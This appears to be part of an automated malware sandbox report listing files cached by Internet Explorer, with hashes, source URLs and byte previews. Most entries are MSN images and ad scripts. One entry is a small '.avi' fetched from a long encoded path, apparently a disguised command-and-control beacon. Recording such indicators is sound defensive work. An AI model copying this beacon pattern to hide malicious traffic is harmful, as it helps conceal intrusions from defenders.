                                                                                                                                                                                            SHA-512:3F2E30DEACBE60CC4A737ED5984881C5A609DFDDA9286DD206B957CA44A1FF85F0A50729916ED3318FF8C76BD1A10AB8DC5AB5F74463849F79D5B76DD43AF0E9
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1c2nP1.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                            Preview: ......JFIF.....,.,.....C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......M.7.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?......U<.M.4.V@<{{.h..YL7.G.... d.C.)....1.1P....F...u..0...I......=.....4(..S..g...n.8&2.J....p)T.AN.@9.H....=.....PM....A..(....X.4..z.C...)..AR.......!.=..........f.. .....AVE....c..*.z.M..U.b.4.=.....(....4.=..L>......`z...`...,z..'..Q..+\ikN.ZP.>..(....4....1x..dz......6?J....S.=.m.6/Jp....!...2....j..c.H,..........>......9....J.......^.!.6..).N.0..._ ..
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1c2ncC[1].jpg
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 206x250, frames 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):5104
                                                                                                                                                                                            Entropy (8bit):7.883475262830791
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:96:BGAaEEE/wdpCGF80HTvjZnWo24JUN2OcSIVFSg02:BCLE/wnfe0vZe3EqIVFP
                                                                                                                                                                                            MD5:5DDF58FB59A75F7CFCD60F433C009C0F
                                                                                                                                                                                            SHA1:4020A7EDDE5FF40B60CED2B5CDDCC592691FDF47
                                                                                                                                                                                            SHA-256:CDF95CD3A6FF5CC7F2827E05815267CE8E5287E291301D06D533D27E0424DF56
                                                                                                                                                                                            SHA-512:BC9B8319AED8E637CE555E600A75D19434BD0B2B7B43937ACB502F0849E6EE4085F80B7B9891CED401D76FB2AC068E80E2AB055DE4E2B1BF06EF560293155584
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1c2ncC.img?h=250&w=206&m=6&q=60&u=t&o=t&l=f&f=jpg&x=475&y=284
                                                                                                                                                                                            Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO..........."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..Z*.......a.......1E...........Z..k..+.42H..,q].....F...D..(.(...;U.l..-.j....\.:..v.....9.ae..).b....d....:n\.l}+Y..?w..-..NE.R.....4`sV.l.T.....\,Q....".....r.7CP.q...%.#.b.U.]n...R.;..<.>.^T..6e*i.V~!...f....x..V.W.-..r.S.M....Nq..M..Gy.4..Er0..J....x..<..U\..o.~.?.I..U..6=n.....Z.jV..U......].[.x.S.....W..>......J..*.h.G#'....D.H..?.=.........
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1c2uJG[1].jpg
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):22635
                                                                                                                                                                                            Entropy (8bit):7.939381616913636
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:7F/y8+Xey6vi8Vbin0xd5f8t/vzHhwyJ9VeKTMA32sDXz1Dm0kcmlWs4gmdZva0f:7A8KyaUbLHkXnp2A32sz1DGcDsmZLYtO
                                                                                                                                                                                            MD5:3AE8F5F61E6852A3F83B8ADCD9515BA1
                                                                                                                                                                                            SHA1:0C9DF561A3B561779F3504F2C0EDEA946A43C4CD
                                                                                                                                                                                            SHA-256:8B8CBBE7420A5734D823F5379F6685E9858AEE6686FDDF485BE6E76FC5CB3164
                                                                                                                                                                                            SHA-512:85C0FCBD6253474C212AF7D914C5EE64767EE2806AD1B210F6E882C178902AC8F69C5F7207F0A802B86F39E82E3550EC2D50DE8580E0079B4ED28DEC3B695E8F
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1c2uJG.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=474&y=255
                                                                                                                                                                                            Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?...+.6..ZJ.)i)h.....aE.P.E.P.E.P..IKH...).R.Q@.E.....I..F...`..@A....(..E.P..f..eA.Mz.z...7c@....gA.d.=.Bo.......7.....!.\.....).;.s...CKX._{..o.u5..45$^...+..>..AKIKH..r...X.d.V........<.P~....O.t..4..iP.s.......KW..I...{.L...6.g....{yn..d...Ov.I....ff9.....6<..~..d...j..nW.....u..jh.8...y.O.M..Fl.....}E2..d...'F.G.T&.&$...v.'.kX.R.......4.)(......(...(...)
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BB1c2wvi[1].jpg
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 0x0, segment length 16, baseline, precision 8, 622x368, frames 3
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):22711
                                                                                                                                                                                            Entropy (8bit):7.94023390958179
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:7L7hA7Wjzic+D/Q7kcla8MmSHL5Afa4rwzu3aOueNTXzTg/WU7LUCW6nZ6dVkBM9:7L7hVHj+D/7cdBXj3aOuUT7UL6sBsX
                                                                                                                                                                                            MD5:F460F9F9DD05B88D1BEDA06017773126
                                                                                                                                                                                            SHA1:7C6704D5B54CC57BF68EA3F5DC03A04A934C12A1
                                                                                                                                                                                            SHA-256:1BEE7840926FA4BDBC23CA1F0D96E80BC20BAC7944AC9B4F54DA267059DCE66B
                                                                                                                                                                                            SHA-512:BD830978AC57054031577533CAF3E0309033D628FF305FD51D4C0DD84312CC9385225A21D329FA6B79104314431B2E03120D5D0573EA43F1BCD8AF2D06D74209
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1c2wvi.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                                                                                                                                                            Preview: ......JFIF.............C................ .....'... .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQRO...C.......&..&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO......p.n.."............................................................}........!1A..Qa."q.2....#B...R..$3br........%&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz..............................................................................................................................w.......!1..AQ.aq."2...B.....#3R..br...$4.%.....&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz....................................................................................?..J(.&)...1G..QE.P..\.qG....4f....L.K@.h.&j..{.+}.n...Z.u..VQ..i.. <...s..<...6\.C.T"G.f.g..5R.B.rj@'.D8^MRi...JbF.9...jr.K...(V/.c..U...>~......4.....1..bMF}.+.Hp...H..R.#.Sa..n<-L@...22.sN..8.).(."..qL..@h..wG....S.r...<..V.!.?Zk...^U.../.!..?...]..]./.d.;.i.4.V....6..zTes@..w!.#.|Uh...N.......T.PWa.{...*.<aI.R.J..T..!....E61.(.b.~\.z....J..t#.YQ.=x.v..J...v.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\BBVuddh[1].png
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):304
                                                                                                                                                                                            Entropy (8bit):6.758580075536471
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6:6v/lhPkR/ChmU5nXyNbWgaviGjZ/wtDi6Xxl32inTvUI8zVp:6v/78/e5nXyNb4lueg32au/
                                                                                                                                                                                            MD5:245557014352A5F957F8BFDA87A3E966
                                                                                                                                                                                            SHA1:9CD29E2AB07DC1FEF64B6946E1F03BCC0A73FC5C
                                                                                                                                                                                            SHA-256:0A33B02F27EE6CD05147D81EDAD86A3184CCAF1979CB73AD67B2434C2A4A6379
                                                                                                                                                                                            SHA-512:686345FD8667C09F905CA732DB98D07E1D72E7ECD9FD26A0C40FEE8E8985F8378E7B2CB8AE99C071043BCB661483DBFB905D46CE40C6BE70EEF78A2BCDE94605
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBVuddh.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                                                                                                                                                            Preview: .PNG........IHDR................a....sRGB.........gAMA......a.....pHYs..........+......IDAT8O...P...3.....v..`0.}...'..."XD.`.`.5.3. ....)...a.-.............d.g.mSC.i..%.8*].}....m.$I0M..u.. ...,9.........i....X..<.y..E..M....q... ."...,5+..]..BP.5.>R....iJ.0.7.|?.....r.\-Ca......IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\NewErrorPageTemplate[1]
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                            Size (bytes):1612
                                                                                                                                                                                            Entropy (8bit):4.869554560514657
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:24:5Y0bQ573pHpACtUZtJD0lFBopZleqw87xTe4D8FaFJ/Doz9AtjJgbCzg:5m73jcJqQep89TEw7Uxkk
                                                                                                                                                                                            MD5:DFEABDE84792228093A5A270352395B6
                                                                                                                                                                                            SHA1:E41258C9576721025926326F76063C2305586F76
                                                                                                                                                                                            SHA-256:77B138AB5D0A90FF04648C26ADDD5E414CC178165E3B54A4CB3739DA0F58E075
                                                                                                                                                                                            SHA-512:E256F603E67335151BB709294749794E2E3085F4063C623461A0B3DECBCCA8E620807B707EC9BCBE36DCD7D639C55753DA0495BE85B4AE5FB6BFC52AB4B284FD
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            Preview: .body..{.. background-repeat: repeat-x;.. background-color: white;.. font-family: "Segoe UI", "verdana", "arial";.. margin: 0em;.. color: #1f1f1f;..}.....mainContent..{.. margin-top:80px;.. width: 700px;.. margin-left: 120px;.. margin-right: 120px;..}.....title..{.. color: #54b0f7;.. font-size: 36px;.. font-weight: 300;.. line-height: 40px;.. margin-bottom: 24px;.. font-family: "Segoe UI", "verdana";.. position: relative;..}.....errorExplanation..{.. color: #000000;.. font-size: 12pt;.. font-family: "Segoe UI", "verdana", "arial";.. text-decoration: none;..}.....taskSection..{.. margin-top: 20px;.. margin-bottom: 28px;.. position: relative; ..}.....tasks..{.. color: #000000;.. font-family: "Segoe UI", "verdana";.. font-weight:200;.. font-size: 12pt;..}....li..{.. margin-top: 8px;..}.....diagnoseButton..{.. outline: none;.. font-size: 9pt;..}.....launchInternetOptionsButton..{.. outline: none;
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\Pvn0[1].avi
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:data
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):5
                                                                                                                                                                                            Entropy (8bit):2.321928094887362
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:3:3:3
                                                                                                                                                                                            MD5:5BFA51F3A417B98E7443ECA90FC94703
                                                                                                                                                                                            SHA1:8C015D80B8A23F780BDD215DC842B0F5551F63BD
                                                                                                                                                                                            SHA-256:BEBE2853A3485D1C2E5C5BE4249183E0DDAFF9F87DE71652371700A89D937128
                                                                                                                                                                                            SHA-512:4CD03686254BB28754CBAA635AE1264723E2BE80CE1DD0F78D1AB7AEE72232F5B285F79E488E9C5C49FF343015BD07BB8433D6CEE08AE3CEA8C317303E3AC399
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:http://ocsp.sca1b.amazontrust.com/images/jhYAn3wKHkyVTfw0/00VSw8f6pL0WGBk/m4PqAGyanFhkbyBOYl/qp5aS987V/V_2F_2BDl1vlB4fNYU_2/F2MBpXT1koABcUI5eof/xLEdBGKD7jA0v_2Fz7BWKv/3L_2BuB2pgeH4/HkdTjRHb/hcfpV3qoBZMqxjVhpVXAZkF/kYfRQAAcy4/xtA2JR23ptN8RGY98/Uvv3IGmm/Pvn0.avi
                                                                                                                                                                                            Preview: 0....
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\a5ea21[1].ico
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 32 x 32, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):758
                                                                                                                                                                                            Entropy (8bit):7.432323547387593
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:6v/792/6TCfasyRmQ/iyzH48qyNkWCj7ev50C5qABOTo+CGB++yg43qX4b9uTmMI:F/6easyD/iCHLSWWqyCoTTdTc+yhaX4v
                                                                                                                                                                                            MD5:84CC977D0EB148166481B01D8418E375
                                                                                                                                                                                            SHA1:00E2461BCD67D7BA511DB230415000AEFBD30D2D
                                                                                                                                                                                            SHA-256:BBF8DA37D92138CC08FFEEC8E3379C334988D5AE99F4415579999BFBBB57A66C
                                                                                                                                                                                            SHA-512:F47A507077F9173FB07EC200C2677BA5F783D645BE100F12EFE71F701A74272A98E853C4FAB63740D685853935D545730992D0004C9D2FE8E1965445CAB509C3
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                                                                                                                                                                                            Preview: .PNG........IHDR... ... ............pHYs.................vpAg... ... ........eIDATH...o.@../..MT..KY..P!9^....:UjS..T."P.(R.PZ.KQZ.S. ....,v2.^.....9/t....K..;_ }'.....~..qK..i.;.B..2.`.C...B........<...CB.....).....;..Bx..2.}.. ._>w!..%B..{.d...LCgz..j/.7D.*.M.*.............'.HK..j%.!DOf7......C.]._Z.f+..1.I+.;.Mf....L:Vhg..[.. ..O:..1.a....F..S.D...8<n.V.7M.....cY@.......4.D..kn%.e.A.@lA.,>\.Q|.N.P........<.!....ip...y..U....J...9...R..mgp}vvn.f4$..X.E.1.T...?.....'.wz..U...../[...z..(DB.B(....-........B.=m.3......X...p...Y........w..<.........8...3.;.0....(..I...A..6f.g.xF..7h.Gmq|....gz_Z...x..0F'..........x..=Y}.,jT..R......72w/...Bh..5..C...2.06`........8@A..."zTXtSoftware..x.sL.OJU..MLO.JML.../.....M....IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\cfdbd9[1].png
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):740
                                                                                                                                                                                            Entropy (8bit):7.552939906140702
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:12:6v/70MpfkExg1J0T5F1NRlYx1TEdLh8vJ542irJQ5nnXZkCaOj0cMgL17jXGW:HMuXk5RwTTEovn0AXZMitL9aW
                                                                                                                                                                                            MD5:FE5E6684967766FF6A8AC57500502910
                                                                                                                                                                                            SHA1:3F660AA0433C4DBB33C2C13872AA5A95BC6D377B
                                                                                                                                                                                            SHA-256:3B6770482AF6DA488BD797AD2682C8D204ED536D0D173EE7BB6CE80D479A2EA7
                                                                                                                                                                                            SHA-512:AF9F1BABF872CBF76FC8C6B497E70F07DF1677BB17A92F54DC837BC2158423B5BF1480FF20553927ECA2E3F57D5E23341E88573A1823F3774BFF8871746FFA51
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/c6/cfdbd9.png
                                                                                                                                                                                            Preview: .PNG........IHDR................U....sBIT....|.d.....pHYs...........~.....tEXtSoftware.Adobe Fireworks CS6......tEXtCreation Time.07/21/16.~y....<IDATH..;k.Q....;.;..&..#...4..2.....V,...X..~.{..|.Cj......B$.%.nb....c1...w.YV....=g.............!..&.$.mI...I.$M.F3.}W,e.%..x.,..c..0.*V....W.=0.uv.X...C....3`....s.....c..............2]E0.....M...^i...[..]5.&...g.z5]H....gf....I....u....:uy.8"....5...0.....z.............o.t...G.."....3.H....Y....3..G....v..T....a.&K......,T.\.[..E......?........D........M..9...ek..kP.A.`2.....k...D.}.\...V%.\..vIM..3.t....8.S.P..........9.....yI.<...9.....R.e.!`..-@........+.a..*x..0.....Y.m.1..N.I...V.'..;.V..a.3.U....,.1c.-.J<..q.m-1...d.A..d.`.4.k..i.......SL.....IEND.B`.
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\fcmain[1].js
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines, with no line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):36826
                                                                                                                                                                                            Entropy (8bit):5.138468005620072
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:768:P1avo7Ub8Dn/eKW94hxiApYXf9wOBEZn3SQN3GFl295oild/7O/cld/es76:dQ+UbOXWmhxiApYXf9wOBEZn3SQN3GF3
                                                                                                                                                                                            MD5:554CB9BA18A7BA28C256E76093770DE8
                                                                                                                                                                                            SHA1:2B37B8BA272DEB68C8C5CB7068A074D90AA155E9
                                                                                                                                                                                            SHA-256:1BE06C80840023D3827F5F506EFD8793ED385B21EF796BC35F5B8C95421E7E91
                                                                                                                                                                                            SHA-512:8AF5007880C06203DF913A0C2C1822D51E27AC8CB8DA16420E217EE81DACDAAE42A58E9ECD96F6440CC1D60CD3611996873C96AEB4FB564B60107E8CCF8F36AB
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://contextual.media.net/803288796/fcmain.js?&gdpr=0&cid=8CU157172&cpcd=pC3JHgSCqY8UHihgrvGr0A%3D%3D&crid=858412214&size=306x271&cc=CH&https=1&vif=2&requrl=https%3A%2F%2Fwww.msn.com%2Fde-ch%2F%3Focid%3Diehp&nse=5&vi=1608297183144663648&ugd=4&rtbs=1&nb=1&cb=window._mNDetails.initAd
                                                                                                                                                                                            Preview: ;window._mNDetails.initAd({"vi":"1608297183144663648","s":{"_mNL2":{"size":"306x271","viComp":"1608295104834729028","hideAdUnitABP":true,"abpl":"3","custHt":"","setL3100":"1"},"lhp":{"l2wsip":"2887305229","l2ac":""},"_mNe":{"pid":"8PO8WH2OT","requrl":"https://www.msn.com/de-ch/?ocid=iehp#mnetcrid=858412214#"},"_md":[],"ac":{"content":"<!DOCTYPE HTML PUBLIC \"-\/\/W3C\/\/DTD HTML 4.01 Transitional\/\/EN\" \"http:\/\/www.w3.org\/TR\/html4\/loose.dtd\">\r\n<html xmlns=\"http:\/\/www.w3.org\/1999\/xhtml\">\r\n<head><meta http-equiv=\"x-dns-prefetch-control\" content=\"on\"><style type=\"text\/css\">body{background-color: transparent;}<\/style><meta name=\"tids\" content=\"a='800072941' b='803767816' c='msn.com' d='entity type'\" \/><script type=\"text\/javascript\">try{window.locHash = (parent._mNDetails && parent._mNDetails.getLocHash && parent._mNDetails.getLocHash(\"858412214\",\"1608297183144663648\")) || (parent._mNDetails[\"locHash\"] && parent._mNDetails[\"locHash\
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\medianet[1].htm
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):385561
                                                                                                                                                                                            Entropy (8bit):5.484255331931173
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:lRP9T2oOFvb2H0m943GNVLgz56CuJbFHm:lkFvye3GNVLg4xpFHm
                                                                                                                                                                                            MD5:9DD0083E00BD11510CE495E0A6AD8096
                                                                                                                                                                                            SHA1:1E8B67450414AC8BE81DE244A52EA5D0313BE7B3
                                                                                                                                                                                            SHA-256:0EFDF25B2B3B61F21581C65E66CB7F43AF56C5E2B7DBFCC66A236EF666C367E2
                                                                                                                                                                                            SHA-512:C5144B65F69AB7948BEA33EA85563BAD0BCB966AF701758E1B4FE12B395B9EA335330EEB3E90BACBC0158744E1D383F572F30997A25ABF49F8EDB503CBF10115
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=722878611&size=306x271&https=1
                                                                                                                                                                                            Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";function e(e){"object"==typeof e&&(p=e)}function n(e){g=e}function t(e){m=e}function o(e){d=e}function r(e){"undefined"==typeof e.logLevel&&(e={logLevel:3,errorVal:e}),e.logLevel>=3&&w[e.logLevel-1].push(e)}function i(){var e,n=0;for(e=0;e<v;e++)n+=w[e].length;if(0!==n){var t,o,r,i,s=new Image,a=p.lurl?p.lurl:"https://lg3-a.akamaihd.net/nerrping.php",f="",c=0;for(e=v-1;e>=0;e--){for(n=w[e].length,t=0;t<n;){if(i=1===e?w[e][t]:{logLevel:w[e][t].logLevel,errorVal:{name:w[e][t].errorVal.name,type:g,svr:m,servname:d,message:w[e][t].errorVal.message,line:w[e][t].errorVal.lineNumber,description:w[e][t].errorVal.description,stack:w[e][t].errorVal.stack}},r=l(i),!(r.length+f.length<=1200)&&f.length){c=1;break}0!==f.length&&(f+=","),f+=r,w[e].shift(),n--
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\medianet[2].htm
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:HTML document, ASCII text, with very long lines
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):385563
                                                                                                                                                                                            Entropy (8bit):5.4842817134104
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:6144:lRP9T2oOFvb2H0m943GNVLgz56CuJb0Hm:lkFvye3GNVLg4xp0Hm
                                                                                                                                                                                            MD5:035E10950EC7C345F2C9F80CE949ADD4
                                                                                                                                                                                            SHA1:A68D1E3B15A3A3B09ED75614061248A161D24454
                                                                                                                                                                                            SHA-256:6901492D507AF5097A62D745A3B9863E32793DBF985B88075C49F1533CAD2DEA
                                                                                                                                                                                            SHA-512:23373781718B448E0BE93A3086149D5703B4F60EF8D62A5ED7666124F2A1805BAF094AE0B939B745F3B62E1267751B2A6B7C01B9F3F039D50DA9521D62279FFA
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://contextual.media.net/medianet.php?cid=8CU157172&crid=858412214&size=306x271&https=1
                                                                                                                                                                                            Preview: <html>.<head></head>.<body style="margin: 0px; padding: 0px; background-color: transparent;">.<script language="javascript" type="text/javascript">window.mnjs=window.mnjs||{},window.mnjs.ERP=window.mnjs.ERP||function(){"use strict";function e(e){"object"==typeof e&&(p=e)}function n(e){g=e}function t(e){m=e}function o(e){d=e}function r(e){"undefined"==typeof e.logLevel&&(e={logLevel:3,errorVal:e}),e.logLevel>=3&&w[e.logLevel-1].push(e)}function i(){var e,n=0;for(e=0;e<v;e++)n+=w[e].length;if(0!==n){var t,o,r,i,s=new Image,a=p.lurl?p.lurl:"https://lg3-a.akamaihd.net/nerrping.php",f="",c=0;for(e=v-1;e>=0;e--){for(n=w[e].length,t=0;t<n;){if(i=1===e?w[e][t]:{logLevel:w[e][t].logLevel,errorVal:{name:w[e][t].errorVal.name,type:g,svr:m,servname:d,message:w[e][t].errorVal.message,line:w[e][t].errorVal.lineNumber,description:w[e][t].errorVal.description,stack:w[e][t].errorVal.stack}},r=l(i),!(r.length+f.length<=1200)&&f.length){c=1;break}0!==f.length&&(f+=","),f+=r,w[e].shift(),n--
                                                                                                                                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\otPcCenter[1].json
                                                                                                                                                                                            Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                                                                                                                                                            File Type:ASCII text, with very long lines, with CRLF line terminators
                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                            Size (bytes):46394
                                                                                                                                                                                            Entropy (8bit):5.58113620851811
                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                            SSDEEP:384:oj+X+jzgBCL2RAAaRKXWSU8zVrX0eQna41wFpWge0bRApQZInjatWLGuD3eWrwAs:4zgEFAJXWeNeIpW4lzZInuWjlHoQthI
                                                                                                                                                                                            MD5:145CAF593D1A355E3ECD5450B51B1527
                                                                                                                                                                                            SHA1:18F98698FC79BA278C4853D0DF2AEE80F61E15A2
                                                                                                                                                                                            SHA-256:0914915E9870A4ED422DB68057A450DF6923A0FA824B1BE11ACA75C99C2DA9C2
                                                                                                                                                                                            SHA-512:D02D8D4F9C894ADAB8A0B476D223653F69273B6A8B0476980CD567B7D7C217495401326B14FCBE632DA67C0CB897C158AFCB7125179728A6B679B5F81CADEB59
                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                            IE Cache URL:https://www.msn.com/_h/511e4956/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/assets/v2/otPcCenter.json
